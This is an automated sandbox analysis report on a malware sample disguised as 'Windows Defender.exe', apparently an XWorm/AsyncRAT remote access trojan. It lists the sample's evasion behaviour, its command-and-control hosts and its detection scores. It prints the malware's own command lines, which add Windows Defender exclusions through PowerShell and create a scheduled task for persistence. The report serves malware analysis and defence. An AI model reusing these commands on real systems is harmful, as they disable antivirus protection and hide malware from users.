                      Source: C:\Users\user\AppData\Local\Windows Defender.exe TID: 6348 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Windows Defender.exe TID: 7004 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\Windows Defender.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\Windows Defender.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Windows Defender.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\Desktop\Windows Defender.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Windows Defender.exeThread delayed: delay time: 922337203685477
                      Source: Windows Defender.exe.0.drBinary or memory string: vmware
                      Source: Windows Defender.exe, 00000000.00000002.3491418383.000000001BCE6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllRR'
                      Source: C:\Users\user\Desktop\Windows Defender.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      Source: C:\Users\user\Desktop\Windows Defender.exe | Code function: 0_2_00007FFD3469764A CheckRemoteDebuggerPresent,0_2_00007FFD3469764A
                      Source: C:\Users\user\Desktop\Windows Defender.exe | Process queried: DebugPort
                      Source: C:\Users\user\Desktop\Windows Defender.exe | Process token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Windows Defender.exe | Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\Windows Defender.exe | Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\Windows Defender.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Windows Defender.exe'
                      Source: C:\Users\user\Desktop\Windows Defender.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Windows Defender.exe'
                      Source: C:\Users\user\Desktop\Windows Defender.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender.exe'
                      Source: C:\Users\user\Desktop\Windows Defender.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Defender" /tr "C:\Users\user\AppData\Local\Windows Defender.exe"
                      Source: Windows Defender.exe, 00000000.00000002.3482001337.0000000002F20000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
                      Source: Windows Defender.exe, 00000000.00000002.3482001337.0000000002F20000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
                      Source: Windows Defender.exe, 00000000.00000002.3482001337.0000000002F20000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
                      Source: Windows Defender.exe, 00000000.00000002.3482001337.0000000002F20000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
                      Source: Windows Defender.exe, 00000000.00000002.3482001337.0000000002F20000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager2
                      Source: C:\Users\user\Desktop\Windows Defender.exe | Queries volume information: C:\Users\user\Desktop\Windows Defender.exe VolumeInformation
                      Source: C:\Users\user\Desktop\Windows Defender.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Windows Defender.exe | Queries volume information: C:\Users\user\AppData\Local\Windows Defender.exe VolumeInformation
                      Source: C:\Users\user\Desktop\Windows Defender.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: Windows Defender.exe, 00000000.00000002.3476665704.00000000010BD000.00000004.00000020.00020000.00000000.sdmp, Windows Defender.exe, 00000000.00000002.3491418383.000000001BD45000.00000004.00000020.00020000.00000000.sdmp, Windows Defender.exe, 00000000.00000002.3491418383.000000001BDB5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Users\user\Desktop\Windows Defender.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Source: Yara match | File source: Windows Defender.exe, type: SAMPLE
Source: Yara match | File source: 0.0.Windows Defender.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Windows Defender.exe.12ea1a78.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.3487954673.0000000012EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.3482001337.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.2229425020.0000000000AD2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Windows Defender.exe PID: 4144, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Windows Defender.exe, type: DROPPED

Remote Access Functionality

Source: Yara match | File source: Windows Defender.exe, type: SAMPLE
Source: Yara match | File source: 0.0.Windows Defender.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Windows Defender.exe.12ea1a78.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.3487954673.0000000012EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.3482001337.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.2229425020.0000000000AD2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Windows Defender.exe PID: 4144, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Local\Windows Defender.exe, type: DROPPED
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 12 Windows Management Instrumentation | 1 Scheduled Task/Job | 12 Process Injection | 1 Masquerading | OS Credential Dumping | 541 Security Software Discovery | Remote Services | 11 Archive Collected Data | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 21 Registry Run Keys / Startup Folder | 1 Scheduled Task/Job | 11 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 PowerShell | 1 DLL Side-Loading | 21 Registry Run Keys / Startup Folder | 151 Virtualization/Sandbox Evasion | Security Account Manager | 151 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 12 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 System Network Configuration Discovery | SSH | Keylogging | 12 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 11 Obfuscated Files or Information | Cached Domain Credentials | 1 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Software Packing | DCSync | 23 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
Behavior Graph (ID: 1528948, Sample: Windows Defender.exe, Startdate: 08/10/2024, Architecture: WINDOWS, Score: 100)

• Windows Defender.exe (started three times from the sample, plus 2 other processes)
  • Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 21 other signatures; Protects its processes via BreakOnTermination flag; Adds a directory exclusion to Windows Defender
  • DNS/IP: ip-api.com (208.95.112.1, 49743, 80, TUT-ASUS, United States); 22.ip.gl.ply.gg (147.185.221.22, 49989, 49991, 49993, SALSGIVERUS, United States)
  • Dropped: C:\Users\user\...\Windows Defender.exe (PE32); C:\Users\user\...\Windows Defender.exe.log (CSV)
  • Starts powershell.exe (three instances, plus 2 other processes); signature: Loading BitLocker PowerShell Module
    • Each powershell.exe starts conhost.exe

Source | Detection | Scanner | Label | Link
Windows Defender.exe | 82% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT |
Windows Defender.exe | 100% | Avira | TR/Spy.Gen |
Windows Defender.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Windows Defender.exe | 100% | Avira | TR/Spy.Gen |
C:\Users\user\AppData\Local\Windows Defender.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Windows Defender.exe | 82% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT |
                      No Antivirus matches
                      No Antivirus matches
Source | Detection | Scanner | Label | Link
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
https://aka.ms/pscore68 | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
http://ip-api.com/line/?fields=hosting | 0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
22.ip.gl.ply.gg | 147.185.221.22 | true | true | | unknown
s-part-0017.t-0009.t-msedge.net | 13.107.246.45 | true | false | | unknown
ip-api.com | 208.95.112.1 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
22.ip.gl.ply.gg | true | | unknown
http://ip-api.com/line/?fields=hosting | false | URL Reputation: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.2349671307.000001B0719FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2442787413.0000019F9E2DD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2588883813.000001851006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2810590289.000002539944B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000B.00000002.2662882198.0000025389609000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000002.00000002.2325444475.000001B061BB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2386207783.0000019F8E498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2487898895.000001850022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2662882198.0000025389609000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000B.00000002.2662882198.0000025389609000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://www.microsoft.cL | powershell.exe, 00000002.00000002.2355459322.000001B079E70000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000002.00000002.2325444475.000001B061BB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2386207783.0000019F8E498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2487898895.000001850022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2662882198.0000025389609000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 0000000B.00000002.2810590289.000002539944B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.2349671307.000001B0719FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2442787413.0000019F9E2DD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2588883813.000001851006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2810590289.000002539944B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 0000000B.00000002.2810590289.000002539944B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 0000000B.00000002.2810590289.000002539944B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.2325444475.000001B061991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2386207783.0000019F8E271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2487898895.0000018500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2662882198.00000253893E1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Windows Defender.exe, 00000000.00000002.3482001337.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2325444475.000001B061991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2386207783.0000019F8E271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2487898895.0000018500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2662882198.00000253893E1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 0000000B.00000002.2662882198.0000025389609000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | | 53334 | TUT-ASUS | true
147.185.221.22 | 22.ip.gl.ply.gg | United States | | 12087 | SALSGIVERUS | true
                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1528948
                                    Start date and time:2024-10-08 14:01:11 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 6m 33s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:23
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:Windows Defender.exe
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winEXE@20/21@2/2
                                    EGA Information:
                                    • Successful, ratio: 12.5%
                                    HCA Information:
                                    • Successful, ratio: 99%
                                    • Number of executed functions: 88
                                    • Number of non-executed functions: 6
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target Windows Defender.exe, PID 3532 because it is empty
                                    • Execution Graph export aborted for target Windows Defender.exe, PID 6360 because it is empty
                                    • Execution Graph export aborted for target Windows Defender.exe, PID 6552 because it is empty
                                    • Execution Graph export aborted for target Windows Defender.exe, PID 884 because it is empty
                                    • Execution Graph export aborted for target powershell.exe, PID 1320 because it is empty
                                    • Execution Graph export aborted for target powershell.exe, PID 5176 because it is empty
                                    • Execution Graph export aborted for target powershell.exe, PID 6904 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtCreateKey calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                    • VT rate limit hit for: Windows Defender.exe
Time | Type | Description
08:02:18 | API Interceptor | 61x Sleep call for process: powershell.exe modified
08:03:26 | API Interceptor | 125x Sleep call for process: Windows Defender.exe modified
14:03:17 | Task Scheduler | Run new task: Windows Defender path: C:\Users\user\AppData\Local\Windows Defender.exe
14:03:17 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows Defender C:\Users\user\AppData\Local\Windows Defender.exe
14:03:25 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Windows Defender C:\Users\user\AppData\Local\Windows Defender.exe
14:03:33 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Defender.lnk
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
208.95.112.1 | scan_88845i.scr.exe | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | Cotizaci#U00f3n P13000996 pdf.exe | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | x2Yi9Hr77a.exe | Get hash | malicious | XWorm | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | z71htmivzKAUpOkr2J.exe | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | scan_374783.js | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | RFQ 002593810024350.bat.exe | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | DHL_Doc.9787653446578978656879764534576879764545766456.exe | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | Request For Quotation.js | Get hash | malicious | AgentTesla | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | PixpFUv4G7.exe | Get hash | malicious | Quasar, XWorm | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | H2f8SkAvdV.exe | Get hash | malicious | Blank Grabber, XWorm | Browse | ip-api.com/json/?fields=225545
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
s-part-0017.t-0009.t-msedge.net | Message_2551600.eml | Get hash | malicious | Unknown | Browse | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | Oilmax Systems Updated.xls | Get hash | malicious | Unknown | Browse | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | SWIFT 103 202410071519130850 071024.pdf.vbs | Get hash | malicious | Remcos | Browse | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | Lk9rbSoFqa.exe | Get hash | malicious | SmokeLoader | Browse | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | po 1105670313_pdf.vbs | Get hash | malicious | Unknown | Browse | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | 20fUAMt5dL.exe | Get hash | malicious | LummaC, Stealc, Vidar | Browse | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | https://url.us.m.mimecastprotect.com/s/ilkSCZ6mm3hDOA2KCjhRFBSqQQ?domain=google.ch | Get hash | malicious | Unknown | Browse | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | Qi517dNlNe.exe | Get hash | malicious | Stealc | Browse | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | SteamCleanz Marlborough Limited.xlsx | Get hash | malicious | Unknown | Browse | 13.107.246.45
s-part-0017.t-0009.t-msedge.net | ctMI3TYXpX.exe | Get hash | malicious | SmokeLoader | Browse | 13.107.246.45
ip-api.com | scan_88845i.scr.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
ip-api.com | Cotizaci#U00f3n P13000996 pdf.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
ip-api.com | x2Yi9Hr77a.exe | Get hash | malicious | XWorm | Browse | 208.95.112.1
ip-api.com | z71htmivzKAUpOkr2J.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
ip-api.com | scan_374783.js | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
ip-api.com | RFQ 002593810024350.bat.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
ip-api.com | DHL_Doc.9787653446578978656879764534576879764545766456.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
ip-api.com | http://tcaconnect.ac-page.com/toronto-construction-association-inc/ | Get hash | malicious | Unknown | Browse | 51.77.64.70
ip-api.com | Request For Quotation.js | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
ip-api.com | PixpFUv4G7.exe | Get hash | malicious | Quasar, XWorm | Browse | 208.95.112.1
22.ip.gl.ply.gg | eFvQTTtxej.exe | Get hash | malicious | Njrat | Browse | 147.185.221.22
22.ip.gl.ply.gg | wB5Gc9RKzG.exe | Get hash | malicious | XWorm | Browse | 147.185.221.22
22.ip.gl.ply.gg | TRXLoader.exe | Get hash | malicious | XWorm | Browse | 147.185.221.22
22.ip.gl.ply.gg | Bootstrapper.exe | Get hash | malicious | XWorm | Browse | 147.185.221.22
22.ip.gl.ply.gg | aimbot.exe | Get hash | malicious | XWorm | Browse | 147.185.221.22
22.ip.gl.ply.gg | XClient.exe | Get hash | malicious | XWorm | Browse | 147.185.221.22
22.ip.gl.ply.gg | Ozj6OxEatlic.exe | Get hash | malicious | XWorm | Browse | 147.185.221.22
22.ip.gl.ply.gg | Neverlose.exe | Get hash | malicious | XWorm | Browse | 147.185.221.22
22.ip.gl.ply.gg | Solara.exe | Get hash | malicious | XWorm | Browse | 147.185.221.22
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
TUT-ASUS | scan_88845i.scr.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
TUT-ASUS | Cotizaci#U00f3n P13000996 pdf.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
TUT-ASUS | x2Yi9Hr77a.exe | Get hash | malicious | XWorm | Browse | 208.95.112.1
TUT-ASUS | z71htmivzKAUpOkr2J.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
TUT-ASUS | scan_374783.js | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
TUT-ASUS | RFQ 002593810024350.bat.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
TUT-ASUS | DHL_Doc.9787653446578978656879764534576879764545766456.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
TUT-ASUS | Request For Quotation.js | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
TUT-ASUS | PixpFUv4G7.exe | Get hash | malicious | Quasar, XWorm | Browse | 208.95.112.1
TUT-ASUS | H2f8SkAvdV.exe | Get hash | malicious | Blank Grabber, XWorm | Browse | 208.95.112.1
SALSGIVERUS | x2Yi9Hr77a.exe | Get hash | malicious | XWorm | Browse | 147.185.221.23
